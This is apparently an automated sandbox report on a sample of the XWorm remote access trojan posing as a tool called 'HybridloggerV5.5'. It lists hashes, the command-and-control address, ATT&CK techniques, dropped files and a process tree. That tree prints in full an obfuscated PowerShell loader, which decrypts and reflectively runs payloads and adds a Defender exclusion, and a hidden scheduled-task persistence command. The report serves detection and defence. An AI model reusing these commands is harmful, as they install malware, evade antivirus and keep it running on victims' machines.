xworm | 9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7

Analysis

max time kernel
30s
max time network
23s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
25/09/2024, 13:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

HybridloggerV5.5.exe_spiggma.exe
Size

937KB
MD5

c9314841cdbf8522e9ee925039d3bfb7
SHA1

1b851459626862fdae6bdc0dd30aadf7a0f905ee
SHA256

9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7
SHA512

fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0
SSDEEP

24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

193.161.193.99:24469

Attributes

Install_directory
%Temp%
install_file
USB.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/2756-53-0x000002875E7E0000-0x000002875E7F6000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 1 IoCs

flow	pid	Process
23	2756	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
5008	powershell.exe
2284	powershell.exe
2756	powershell.exe
5008	powershell.exe
2756	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	HybridloggerV5.5.exe_spiggma.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\Control Panel\International\Geo\Nation	WScript.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
22	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
5008	powershell.exe
5008	powershell.exe
2284	powershell.exe
2284	powershell.exe
2756	powershell.exe
2756	powershell.exe
2756	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5008	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeIncreaseQuotaPrivilege	2284	powershell.exe
Token: SeSecurityPrivilege	2284	powershell.exe
Token: SeTakeOwnershipPrivilege	2284	powershell.exe
Token: SeLoadDriverPrivilege	2284	powershell.exe
Token: SeSystemProfilePrivilege	2284	powershell.exe
Token: SeSystemtimePrivilege	2284	powershell.exe
Token: SeProfSingleProcessPrivilege	2284	powershell.exe
Token: SeIncBasePriorityPrivilege	2284	powershell.exe
Token: SeCreatePagefilePrivilege	2284	powershell.exe
Token: SeBackupPrivilege	2284	powershell.exe
Token: SeRestorePrivilege	2284	powershell.exe
Token: SeShutdownPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeSystemEnvironmentPrivilege	2284	powershell.exe
Token: SeRemoteShutdownPrivilege	2284	powershell.exe
Token: SeUndockPrivilege	2284	powershell.exe
Token: SeManageVolumePrivilege	2284	powershell.exe
Token: 33	2284	powershell.exe
Token: 34	2284	powershell.exe
Token: 35	2284	powershell.exe
Token: 36	2284	powershell.exe
Token: SeIncreaseQuotaPrivilege	2284	powershell.exe
Token: SeSecurityPrivilege	2284	powershell.exe
Token: SeTakeOwnershipPrivilege	2284	powershell.exe
Token: SeLoadDriverPrivilege	2284	powershell.exe
Token: SeSystemProfilePrivilege	2284	powershell.exe
Token: SeSystemtimePrivilege	2284	powershell.exe
Token: SeProfSingleProcessPrivilege	2284	powershell.exe
Token: SeIncBasePriorityPrivilege	2284	powershell.exe
Token: SeCreatePagefilePrivilege	2284	powershell.exe
Token: SeBackupPrivilege	2284	powershell.exe
Token: SeRestorePrivilege	2284	powershell.exe
Token: SeShutdownPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeSystemEnvironmentPrivilege	2284	powershell.exe
Token: SeRemoteShutdownPrivilege	2284	powershell.exe
Token: SeUndockPrivilege	2284	powershell.exe
Token: SeManageVolumePrivilege	2284	powershell.exe
Token: 33	2284	powershell.exe
Token: 34	2284	powershell.exe
Token: 35	2284	powershell.exe
Token: 36	2284	powershell.exe
Token: SeIncreaseQuotaPrivilege	2284	powershell.exe
Token: SeSecurityPrivilege	2284	powershell.exe
Token: SeTakeOwnershipPrivilege	2284	powershell.exe
Token: SeLoadDriverPrivilege	2284	powershell.exe
Token: SeSystemProfilePrivilege	2284	powershell.exe
Token: SeSystemtimePrivilege	2284	powershell.exe
Token: SeProfSingleProcessPrivilege	2284	powershell.exe
Token: SeIncBasePriorityPrivilege	2284	powershell.exe
Token: SeCreatePagefilePrivilege	2284	powershell.exe
Token: SeBackupPrivilege	2284	powershell.exe
Token: SeRestorePrivilege	2284	powershell.exe
Token: SeShutdownPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeSystemEnvironmentPrivilege	2284	powershell.exe
Token: SeRemoteShutdownPrivilege	2284	powershell.exe
Token: SeUndockPrivilege	2284	powershell.exe
Token: SeManageVolumePrivilege	2284	powershell.exe
Token: 33	2284	powershell.exe
Token: 34	2284	powershell.exe
Token: 35	2284	powershell.exe

Suspicious use of WriteProcessMemory 24 IoCs

description	pid	Process	procid_target
PID 4860 wrote to memory of 1424	4860	HybridloggerV5.5.exe_spiggma.exe	87
PID 4860 wrote to memory of 1424	4860	HybridloggerV5.5.exe_spiggma.exe	87
PID 4860 wrote to memory of 5084	4860	HybridloggerV5.5.exe_spiggma.exe	89
PID 4860 wrote to memory of 5084	4860	HybridloggerV5.5.exe_spiggma.exe	89
PID 1424 wrote to memory of 4076	1424	cmd.exe	91
PID 1424 wrote to memory of 4076	1424	cmd.exe	91
PID 5084 wrote to memory of 4544	5084	cmd.exe	92
PID 5084 wrote to memory of 4544	5084	cmd.exe	92
PID 4544 wrote to memory of 1244	4544	net.exe	93
PID 4544 wrote to memory of 1244	4544	net.exe	93
PID 5084 wrote to memory of 5008	5084	cmd.exe	94
PID 5084 wrote to memory of 5008	5084	cmd.exe	94
PID 5008 wrote to memory of 2284	5008	powershell.exe	96
PID 5008 wrote to memory of 2284	5008	powershell.exe	96
PID 5008 wrote to memory of 2800	5008	powershell.exe	98
PID 5008 wrote to memory of 2800	5008	powershell.exe	98
PID 2800 wrote to memory of 4364	2800	WScript.exe	100
PID 2800 wrote to memory of 4364	2800	WScript.exe	100
PID 4364 wrote to memory of 2416	4364	cmd.exe	102
PID 4364 wrote to memory of 2416	4364	cmd.exe	102
PID 2416 wrote to memory of 5012	2416	net.exe	103
PID 2416 wrote to memory of 5012	2416	net.exe	103
PID 4364 wrote to memory of 2756	4364	cmd.exe	104
PID 4364 wrote to memory of 2756	4364	cmd.exe	104

C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe_spiggma.exe
"C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe_spiggma.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1424
- - C:\Windows\system32\chcp.com
    chcp 65001
    3⤵
    PID:4076
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5084
- - C:\Windows\system32\net.exe
    net file
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4544
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 file
      4⤵
      PID:1244
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5008
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_326_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_326.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2284
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_326.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2800
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_326.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4364
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2416
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:5012
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_326.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2756

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=1020,i,12470628711992022444,7767535593390851522,262144 --variations-seed-version --mojo-platform-channel-handle=1436 /prefetch:8
1⤵
PID:1500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
661739d384d9dfd807a089721202900b

SHA1
5b2c5d6a7122b4ce849dc98e79a7713038feac55

SHA256
70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

SHA512
81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1cc5e033811a5d520bb4a6904b5c433b

SHA1
c159a342ed372790600b3a6ac97e274638a0ce9a

SHA256
9e20052dd29dfcd8220dcf271acd3e27f9d6b785d72531043741ef349b48c7a8

SHA512
dd8b57e50382a7a84aea3986c3ae8a38ade0fb84a5c9696339487022321be12f08aff9d47455a28137e31a8632cda2490dcf0332c6b3c72e7cfdd10e63e4f429

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat

Filesize
12KB

MD5
89a22d3791ca38666c8144725a74497d

SHA1
96b672089a3c783e4dd27e8da7c0cc1245d55cfd

SHA256
9326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94

SHA512
6b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat

Filesize
910KB

MD5
72ecd938d114e246eeebc8ae430fc2e9

SHA1
9ece59be22ceadcb3951093483cc69a76658801d

SHA256
4eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65

SHA512
d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_khkfdxmx.umb.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_326.vbs

Filesize
115B

MD5
8bde8214d45b842422103e761ef2b32c

SHA1
f59870b2d70f97bfa373f1bd87c5d434776cdda9

SHA256
1d51a164be0832e6406737d413f7911f53543e5962e30ddcbb1e174503e58271

SHA512
6413c68df7b0b9d26c0db3acbb2cdfe727cd3c6c5ad54b9dba4f7c4be0531096c451157f0eaf5e4e202ede324c5e42ac0706f7b74286e6a3ef07aa1b55271128

Download Submit
memory/2756-53-0x000002875E7E0000-0x000002875E7F6000-memory.dmp

Filesize
88KB

Download
memory/4860-0-0x00007FFE962F3000-0x00007FFE962F5000-memory.dmp

Filesize
8KB

Download
memory/4860-1-0x0000000000380000-0x0000000000470000-memory.dmp

Filesize
960KB

Download
memory/5008-11-0x000002456CD30000-0x000002456CD52000-memory.dmp

Filesize
136KB

Download
memory/5008-21-0x000002456CF90000-0x000002456CF98000-memory.dmp

Filesize
32KB

Download
memory/5008-22-0x000002456CFC0000-0x000002456CFF8000-memory.dmp

Filesize
224KB

Download